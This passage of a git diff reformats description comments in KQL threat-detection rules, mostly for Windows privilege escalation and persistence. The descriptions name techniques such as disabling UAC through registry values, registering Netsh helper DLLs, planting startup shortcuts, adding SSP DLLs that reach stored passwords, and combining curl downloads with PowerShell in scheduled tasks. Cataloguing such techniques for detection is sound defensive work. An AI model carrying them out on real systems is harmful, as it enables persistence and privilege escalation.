-This can be part of a privilege escalation strategy, as it allows the execution of commands with elevated privileges in a controlled environment as seen in CVE-2025-32463.
-While investigating, look out for unusual or unexpected use of 'sudo --chroot' in conjunction with other commands or scripts such as execution from temporary directories or unusual user accounts.
-
+// Attackers may use this technique to evade detection and execute commands in a modified environment.
+// This can be part of a privilege escalation strategy, as it allows the execution of commands with elevated privileges in a controlled environment as seen in CVE-2025-32463.
+// While investigating, look out for unusual or unexpected use of 'sudo --chroot' in conjunction with other commands or scripts such as execution from temporary directories or unusual user accounts.
 // MITRE Tactic: Privilege Escalation
 // Tags: attack.privilege-escalation, attack.t1068
 // False Positives:
diff --git a/KQL/rules/Privilege Escalation/network_connection_initiated_via_notepad_exe.kql b/KQL/rules/Privilege Escalation/network_connection_initiated_via_notepad_exe.kql
index ce0452d8..c926c9a4 100644
--- a/KQL/rules/Privilege Escalation/network_connection_initiated_via_notepad_exe.kql
+++ b/KQL/rules/Privilege Escalation/network_connection_initiated_via_notepad_exe.kql
@@ -3,9 +3,8 @@
 // Date: 2020-05-14
 // Level: high
 // Description: Detects a network connection that is initiated by the "notepad.exe" process.
-This might be a sign of process injection from a beacon process or something similar.
-Notepad rarely initiates a network communication except when printing documents for example.
-
+// This might be a sign of process injection from a beacon process or something similar.
+// Notepad rarely initiates a network communication except when printing documents for example.
 // MITRE Tactic: Privilege Escalation
 // Tags: attack.privilege-escalation, attack.command-and-control, attack.execution, attack.defense-evasion, attack.t1055
 // False Positives:
diff --git a/KQL/rules/Privilege Escalation/new_custom_shim_database_created.kql b/KQL/rules/Privilege Escalation/new_custom_shim_database_created.kql
index 44b10093..ea14e885 100644
--- a/KQL/rules/Privilege Escalation/new_custom_shim_database_created.kql
+++ b/KQL/rules/Privilege Escalation/new_custom_shim_database_created.kql
@@ -3,8 +3,7 @@
 // Date: 2021-12-29
 // Level: medium
 // Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.
-The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.
-
+// The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.
 // MITRE Tactic: Privilege Escalation
 // Tags: attack.privilege-escalation, attack.persistence, attack.t1547.009
 // False Positives:
diff --git a/KQL/rules/Privilege Escalation/new_netsh_helper_dll_registered_from_a_suspicious_location.kql b/KQL/rules/Privilege Escalation/new_netsh_helper_dll_registered_from_a_suspicious_location.kql
index f761f8ed..337e8c14 100644
--- a/KQL/rules/Privilege Escalation/new_netsh_helper_dll_registered_from_a_suspicious_location.kql
+++ b/KQL/rules/Privilege Escalation/new_netsh_helper_dll_registered_from_a_suspicious_location.kql
@@ -3,7 +3,6 @@
 // Date: 2023-11-28
 // Level: high
 // Description: Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
-
 // MITRE Tactic: Privilege Escalation
 // Tags: attack.privilege-escalation, attack.persistence, attack.t1546.007
diff --git a/KQL/rules/Privilege Escalation/password_set_to_never_expire_via_wmi.kql b/KQL/rules/Privilege Escalation/password_set_to_never_expire_via_wmi.kql
index 99dd7739..a40c936b 100644
--- a/KQL/rules/Privilege Escalation/password_set_to_never_expire_via_wmi.kql
+++ b/KQL/rules/Privilege Escalation/password_set_to_never_expire_via_wmi.kql
@@ -3,7 +3,6 @@
 // Date: 2025-07-30
 // Level: medium
 // Description: Detects the use of wmic.exe to modify user account settings and explicitly disable password expiration.
-
 // MITRE Tactic: Privilege Escalation
 // Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1047, attack.t1098
 // False Positives:
diff --git a/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_deviceenroller_exe.kql b/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_deviceenroller_exe.kql
index 43108576..1016a14b 100644
--- a/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_deviceenroller_exe.kql
+++ b/KQL/rules/Privilege Escalation/potential_dll_sideloading_via_deviceenroller_exe.kql
@@ -3,8 +3,7 @@
 // Date: 2022-08-29
 // Level: medium
 // Description: Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll".
-Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
-
+// Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
 // MITRE Tactic: Privilege Escalation
 // Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_app_paths_default_property.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_app_paths_default_property.kql
index 23a1da4f..be2ef769 100644
--- a/KQL/rules/Privilege Escalation/potential_persistence_via_app_paths_default_property.kql
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_app_paths_default_property.kql
@@ -3,10 +3,9 @@
 // Date: 2022-08-10
 // Level: high
 // Description: Detects changes to the "Default" property for keys located in the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry. Which might be used as a method of persistence
-The entries found under App Paths are used primarily for the following purposes.
-First, to map an application's executable file name to that file's fully qualified path.
-Second, to prepend information to the PATH environment variable on a per-application, per-process basis.
-
+// The entries found under App Paths are used primarily for the following purposes.
+// First, to map an application's executable file name to that file's fully qualified path.
+// Second, to prepend information to the PATH environment variable on a per-application, per-process basis.
 // MITRE Tactic: Privilege Escalation
 // Tags: attack.privilege-escalation, attack.persistence, attack.t1546.012
 // False Positives:
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_appcompat_registerapprestart_layer.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_appcompat_registerapprestart_layer.kql
index 0127fdbd..4eaac851 100644
--- a/KQL/rules/Privilege Escalation/potential_persistence_via_appcompat_registerapprestart_layer.kql
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_appcompat_registerapprestart_layer.kql
@@ -3,9 +3,8 @@
 // Date: 2024-01-01
 // Level: medium
 // Description: Detects the setting of the REGISTERAPPRESTART compatibility layer on an application.
-This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API.
-This can be potentially abused as a persistence mechanism.
-
+// This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API.
+// This can be potentially abused as a persistence mechanism.
 // MITRE Tactic: Privilege Escalation
 // Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011
 // False Positives:
diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_microsoft_compatibility_appraiser.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_microsoft_compatibility_appraiser.kql
index 23c7e4c2..ae1e326d 100644
--- a/KQL/rules/Privilege Escalation/potential_persistence_via_microsoft_compatibility_appraiser.kql
+++ b/KQL/rules/Privilege Escalation/potential_persistence_via_microsoft_compatibility_appraiser.kql
@@ -3,8 +3,7 @@ // Date: 2020-09-29 // Level: medium // Description: Detects manual execution of the "Microsoft Compatibility Appraiser" task via schtasks. -In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key. - +// In order to trigger persistence stored in the "\AppCompatFlags\TelemetryController" registry key. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005 diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll.kql index 1b1339e5..6b86162a 100644 --- a/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll.kql +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll.kql @@ -3,7 +3,6 @@ // Date: 2019-10-25 // Level: medium // Description: Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed. - // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1546.007, attack.s0108 diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll_registry.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll_registry.kql index a3f64d2d..41364086 100644 --- a/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll_registry.kql +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll_registry.kql 
@@ -3,7 +3,6 @@ // Date: 2023-11-28 // Level: medium // Description: Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper - // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1546.007 // False Positives: diff --git a/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_modification.kql b/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_modification.kql index 4b9d4822..0f6cc0ae 100644 --- a/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_modification.kql +++ b/KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_modification.kql @@ -3,8 +3,7 @@ // Date: 2021-12-30 // Level: medium // Description: Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. -The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time - +// The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1546.011 // False Positives: diff --git a/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_windows_telemetry.kql b/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_windows_telemetry.kql index d80bf4f8..cc243a12 100644 --- a/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_windows_telemetry.kql +++ b/KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_windows_telemetry.kql 
@@ -3,10 +3,9 @@ // Date: 2020-10-16 // Level: high // Description: Detects potential persistence behavior using the windows telemetry registry key. -Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. -This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. -The problem is, it will run any arbitrary command without restriction of location or type. - +// Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. +// This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. +// The problem is, it will run any arbitrary command without restriction of location or type. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005 diff --git a/KQL/rules/Privilege Escalation/potential_ripzip_attack_on_startup_folder.kql b/KQL/rules/Privilege Escalation/potential_ripzip_attack_on_startup_folder.kql index a84df41f..eee75d40 100644 --- a/KQL/rules/Privilege Escalation/potential_ripzip_attack_on_startup_folder.kql +++ b/KQL/rules/Privilege Escalation/potential_ripzip_attack_on_startup_folder.kql 
@@ -3,9 +3,8 @@ // Date: 2022-07-21 // Level: high // Description: Detects a phishing attack which expands a ZIP file containing a malicious shortcut. -If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. -Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation. - +// If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. +// Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1547 diff --git a/KQL/rules/Privilege Escalation/potential_startup_shortcut_persistence_via_powershell_exe.kql b/KQL/rules/Privilege Escalation/potential_startup_shortcut_persistence_via_powershell_exe.kql index e0b0fdfa..eab7732d 100644 --- a/KQL/rules/Privilege Escalation/potential_startup_shortcut_persistence_via_powershell_exe.kql +++ b/KQL/rules/Privilege Escalation/potential_startup_shortcut_persistence_via_powershell_exe.kql 
@@ -3,10 +3,9 @@ // Date: 2021-10-24 // Level: high // Description: Detects PowerShell writing startup shortcuts. -This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence. -Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats. -In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL" - +// This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence. +// Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats. +// In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL" // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 // False Positives: diff --git a/KQL/rules/Privilege Escalation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql b/KQL/rules/Privilege Escalation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql index 8c557d30..66dfa068 100644 --- a/KQL/rules/Privilege Escalation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql +++ b/KQL/rules/Privilege Escalation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql 
@@ -3,8 +3,7 @@ // Date: 2025-02-05 // Level: medium // Description: Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them. -This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host. - +// This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.005, attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105 // False Positives: diff --git a/KQL/rules/Privilege Escalation/scheduled_task_job_at.kql b/KQL/rules/Privilege Escalation/scheduled_task_job_at.kql index 15181baa..8aa8670e 100644 --- a/KQL/rules/Privilege Escalation/scheduled_task_job_at.kql +++ b/KQL/rules/Privilege Escalation/scheduled_task_job_at.kql @@ -3,8 +3,7 @@ // Date: 2020-10-06 // Level: low // Description: Detects the use of at/atd which are utilities that are used to schedule tasks. -They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code - +// They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1053.002 // False Positives: diff --git a/KQL/rules/Privilege Escalation/security_support_provider_ssp_added_to_lsa_configuration.kql b/KQL/rules/Privilege Escalation/security_support_provider_ssp_added_to_lsa_configuration.kql index e834eadf..705f8198 100644 --- a/KQL/rules/Privilege Escalation/security_support_provider_ssp_added_to_lsa_configuration.kql 
+++ b/KQL/rules/Privilege Escalation/security_support_provider_ssp_added_to_lsa_configuration.kql @@ -3,7 +3,6 @@ // Date: 2019-01-18 // Level: high // Description: Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows. - // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1547.005 diff --git a/KQL/rules/Privilege Escalation/setup16_exe_execution_with_custom_lst_file.kql b/KQL/rules/Privilege Escalation/setup16_exe_execution_with_custom_lst_file.kql index b81cd9e0..f6d0eeb2 100644 --- a/KQL/rules/Privilege Escalation/setup16_exe_execution_with_custom_lst_file.kql +++ b/KQL/rules/Privilege Escalation/setup16_exe_execution_with_custom_lst_file.kql @@ -3,9 +3,8 @@ // Date: 2024-12-01 // Level: medium // Description: Detects the execution of "Setup16.EXE" and old installation utility with a custom ".lst" file. -These ".lst" file can contain references to external program that "Setup16.EXE" will execute. -Attackers and adversaries might leverage this as a living of the land utility. - +// These ".lst" file can contain references to external program that "Setup16.EXE" will execute. +// Attackers and adversaries might leverage this as a living of the land utility. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.005 // False Positives: diff --git a/KQL/rules/Privilege Escalation/suspicious_autorun_registry_modified_via_wmi.kql b/KQL/rules/Privilege Escalation/suspicious_autorun_registry_modified_via_wmi.kql index 88a2255e..940fd4e4 100644 --- a/KQL/rules/Privilege Escalation/suspicious_autorun_registry_modified_via_wmi.kql +++ b/KQL/rules/Privilege Escalation/suspicious_autorun_registry_modified_via_wmi.kql 
@@ -3,7 +3,6 @@ // Date: 2025-02-17 // Level: high // Description: Detects suspicious activity where the WMIC process is used to create an autorun registry entry via reg.exe, which is often indicative of persistence mechanisms employed by malware. - // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1547.001, attack.t1047 // False Positives: diff --git a/KQL/rules/Privilege Escalation/suspicious_get_variable_exe_creation.kql b/KQL/rules/Privilege Escalation/suspicious_get_variable_exe_creation.kql index 26d01298..9e65730c 100644 --- a/KQL/rules/Privilege Escalation/suspicious_get_variable_exe_creation.kql +++ b/KQL/rules/Privilege Escalation/suspicious_get_variable_exe_creation.kql @@ -3,9 +3,8 @@ // Date: 2022-04-23 // Level: high // Description: Get-Variable is a valid PowerShell cmdlet -WindowsApps is by default in the path where PowerShell is executed. -So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet. - +// WindowsApps is by default in the path where PowerShell is executed. +// So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1546, attack.defense-evasion, attack.t1027 diff --git a/KQL/rules/Privilege Escalation/suspicious_modification_of_scheduled_tasks.kql b/KQL/rules/Privilege Escalation/suspicious_modification_of_scheduled_tasks.kql index 1b1cc9ae..2e570eeb 100644 --- a/KQL/rules/Privilege Escalation/suspicious_modification_of_scheduled_tasks.kql +++ b/KQL/rules/Privilege Escalation/suspicious_modification_of_scheduled_tasks.kql 
@@ -3,9 +3,8 @@ // Date: 2022-07-28 // Level: high // Description: Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location -Attackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on -Instead they modify the task after creation to include their malicious payload - +// Attackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on +// Instead they modify the task after creation to include their malicious payload // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.execution, attack.t1053.005 diff --git a/KQL/rules/Privilege Escalation/suspicious_screensaver_binary_file_creation.kql b/KQL/rules/Privilege Escalation/suspicious_screensaver_binary_file_creation.kql index 17d1a303..549a2d51 100644 --- a/KQL/rules/Privilege Escalation/suspicious_screensaver_binary_file_creation.kql +++ b/KQL/rules/Privilege Escalation/suspicious_screensaver_binary_file_creation.kql @@ -3,8 +3,7 @@ // Date: 2021-12-29 // Level: medium // Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity. -Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension - +// Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1546.002 diff --git a/KQL/rules/Privilege Escalation/suspicious_startup_folder_persistence.kql b/KQL/rules/Privilege Escalation/suspicious_startup_folder_persistence.kql index c0cd8516..afbe4a05 100644 --- a/KQL/rules/Privilege Escalation/suspicious_startup_folder_persistence.kql 
+++ b/KQL/rules/Privilege Escalation/suspicious_startup_folder_persistence.kql @@ -3,9 +3,8 @@ // Date: 2022-08-10 // Level: high // Description: Detects the creation of potentially malicious script and executable files in Windows startup folders, which is a common persistence technique used by threat actors. -These files (.ps1, .vbs, .js, .bat, etc.) are automatically executed when a user logs in, making the Startup folder an attractive target for attackers. -This technique is frequently observed in malvertising campaigns and malware distribution where attackers attempt to maintain long-term access to compromised systems. - +// These files (.ps1, .vbs, .js, .bat, etc.) are automatically executed when a user logs in, making the Startup folder an attractive target for attackers. +// This technique is frequently observed in malvertising campaigns and malware distribution where attackers attempt to maintain long-term access to compromised systems. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.execution, attack.t1204.002, attack.persistence, attack.t1547.001 // False Positives: diff --git a/KQL/rules/Privilege Escalation/tasks_folder_evasion.kql b/KQL/rules/Privilege Escalation/tasks_folder_evasion.kql index 898abe2f..4303ff41 100644 --- a/KQL/rules/Privilege Escalation/tasks_folder_evasion.kql +++ b/KQL/rules/Privilege Escalation/tasks_folder_evasion.kql 
@@ -3,9 +3,8 @@ // Date: 2020-01-13 // Level: high // Description: The Tasks folder in system32 and syswow64 are globally writable paths. -Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application -in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr - +// Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application +// in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.execution, attack.t1574.001 diff --git a/KQL/rules/Privilege Escalation/uac_disabled.kql b/KQL/rules/Privilege Escalation/uac_disabled.kql index 4e5c63ad..e9051e8b 100644 --- a/KQL/rules/Privilege Escalation/uac_disabled.kql +++ b/KQL/rules/Privilege Escalation/uac_disabled.kql @@ -3,7 +3,6 @@ // Date: 2022-01-05 // Level: medium // Description: Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value "EnableLUA" to 0. - // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 diff --git a/KQL/rules/Privilege Escalation/uac_notification_disabled.kql b/KQL/rules/Privilege Escalation/uac_notification_disabled.kql index d20cf544..b9ef9d72 100644 --- a/KQL/rules/Privilege Escalation/uac_notification_disabled.kql +++ b/KQL/rules/Privilege Escalation/uac_notification_disabled.kql 
@@ -3,9 +3,8 @@ // Date: 2024-05-10 // Level: medium // Description: Detects when an attacker tries to disable User Account Control (UAC) notification by tampering with the "UACDisableNotify" value. -UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users. -When "UACDisableNotify" is set to 1, UAC prompts are suppressed. - +// UAC is a critical security feature in Windows that prevents unauthorized changes to the operating system. It prompts the user for permission or an administrator password before allowing actions that could affect the system's operation or change settings that affect other users. +// When "UACDisableNotify" is set to 1, UAC prompts are suppressed. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 diff --git a/KQL/rules/Privilege Escalation/uac_secure_desktop_prompt_disabled.kql b/KQL/rules/Privilege Escalation/uac_secure_desktop_prompt_disabled.kql index ab521f3a..b57657bf 100644 --- a/KQL/rules/Privilege Escalation/uac_secure_desktop_prompt_disabled.kql +++ b/KQL/rules/Privilege Escalation/uac_secure_desktop_prompt_disabled.kql 
@@ -3,9 +3,8 @@ // Date: 2024-05-10 // Level: medium // Description: Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the "PromptOnSecureDesktop" value. -The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts. -When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software. - +// The "PromptOnSecureDesktop" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts. +// When "PromptOnSecureDesktop" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002 diff --git a/KQL/rules/Privilege Escalation/windows_event_log_access_tampering_via_registry.kql b/KQL/rules/Privilege Escalation/windows_event_log_access_tampering_via_registry.kql index 1e929cb5..e55b9cc6 100644 --- a/KQL/rules/Privilege Escalation/windows_event_log_access_tampering_via_registry.kql +++ b/KQL/rules/Privilege Escalation/windows_event_log_access_tampering_via_registry.kql 
@@ -3,7 +3,6 @@ // Date: 2025-01-16 // Level: high // Description: Detects changes to the Windows EventLog channel permission values. It focuses on changes to the Security Descriptor Definition Language (SDDL) string, as modifications to these values can restrict access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify a event log channel. Upon execution, the user shouldn't be able to access the event log channel via the event viewer or via utilities such as "Get-EventLog" or "wevtutil". - // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1547.001, attack.t1112 // False Positives: diff --git a/KQL/rules/Privilege Escalation/winlogon_notify_key_logon_persistence.kql b/KQL/rules/Privilege Escalation/winlogon_notify_key_logon_persistence.kql index 4304fcd6..d06cabcd 100644 --- a/KQL/rules/Privilege Escalation/winlogon_notify_key_logon_persistence.kql +++ b/KQL/rules/Privilege Escalation/winlogon_notify_key_logon_persistence.kql @@ -3,8 +3,7 @@ // Date: 2021-12-30 // Level: high // Description: Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. -Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. - +// Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1547.004 diff --git a/KQL/rules/Privilege Escalation/winrar_creating_files_in_startup_locations.kql b/KQL/rules/Privilege Escalation/winrar_creating_files_in_startup_locations.kql index 36495bef..eece0e6e 100644 --- a/KQL/rules/Privilege Escalation/winrar_creating_files_in_startup_locations.kql 
+++ b/KQL/rules/Privilege Escalation/winrar_creating_files_in_startup_locations.kql @@ -3,8 +3,7 @@ // Date: 2025-07-16 // Level: high // Description: Detects WinRAR creating files in Windows startup locations, which may indicate an attempt to establish persistence by adding malicious files to the Startup folder. -This kind of behaviour has been associated with exploitation of WinRAR path traversal vulnerability CVE-2025-6218 or CVE-2025-8088. - +// This kind of behaviour has been associated with exploitation of WinRAR path traversal vulnerability CVE-2025-6218 or CVE-2025-8088. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 diff --git a/KQL/rules/Privilege Escalation/writing_local_admin_share.kql b/KQL/rules/Privilege Escalation/writing_local_admin_share.kql index 511889d6..19f273fa 100644 --- a/KQL/rules/Privilege Escalation/writing_local_admin_share.kql +++ b/KQL/rules/Privilege Escalation/writing_local_admin_share.kql @@ -3,8 +3,7 @@ // Date: 2022-01-01 // Level: medium // Description: Aversaries may use to interact with a remote network share using Server Message Block (SMB). -This technique is used by post-exploitation frameworks. - +// This technique is used by post-exploitation frameworks. // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.lateral-movement, attack.t1546.002 diff --git a/KQL/rules/Privilege Escalation/xwizard_exe_execution_from_non_default_location.kql b/KQL/rules/Privilege Escalation/xwizard_exe_execution_from_non_default_location.kql index e9da2e17..215c87d7 100644 --- a/KQL/rules/Privilege Escalation/xwizard_exe_execution_from_non_default_location.kql +++ b/KQL/rules/Privilege Escalation/xwizard_exe_execution_from_non_default_location.kql 
@@ -3,8 +3,7 @@ // Date: 2021-09-20 // Level: high // Description: Detects the execution of Xwizard tool from a non-default directory. -When executed from a non-default directory, this utility can be abused in order to side load a custom version of "xwizards.dll". - +// When executed from a non-default directory, this utility can be abused in order to side load a custom version of "xwizards.dll". // MITRE Tactic: Privilege Escalation // Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001 // False Positives: diff --git a/KQL/rules/Reconnaissance/pua_pingcastle_execution_from_potentially_suspicious_parent.kql b/KQL/rules/Reconnaissance/pua_pingcastle_execution_from_potentially_suspicious_parent.kql index 2e92ce4e..26f09524 100644 --- a/KQL/rules/Reconnaissance/pua_pingcastle_execution_from_potentially_suspicious_parent.kql +++ b/KQL/rules/Reconnaissance/pua_pingcastle_execution_from_potentially_suspicious_parent.kql @@ -3,7 +3,6 @@ // Date: 2024-01-11 // Level: high // Description: Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level via a script located in a potentially suspicious or uncommon location. - // MITRE Tactic: Reconnaissance // Tags: attack.reconnaissance, attack.t1595 diff --git a/KQL/rules/Resource Development/vhd_image_download_via_browser.kql b/KQL/rules/Resource Development/vhd_image_download_via_browser.kql index d3d176b0..6d0b5249 100644 --- a/KQL/rules/Resource Development/vhd_image_download_via_browser.kql +++ b/KQL/rules/Resource Development/vhd_image_download_via_browser.kql 
@@ -3,8 +3,7 @@
 // Date: 2021-10-25
 // Level: medium
 // Description: Detects creation of ".vhd"/".vhdx" files by browser processes.
-Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls.
-
+// Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls.
 // MITRE Tactic: Resource Development
 // Tags: attack.resource-development, attack.t1587.001
 // False Positives:
diff --git a/helper.py b/helper.py
index d2bce32f..f5b00022 100644
--- a/helper.py
+++ b/helper.py
@@ -174,7 +174,17 @@ def extract_mitre_tactic(tags):
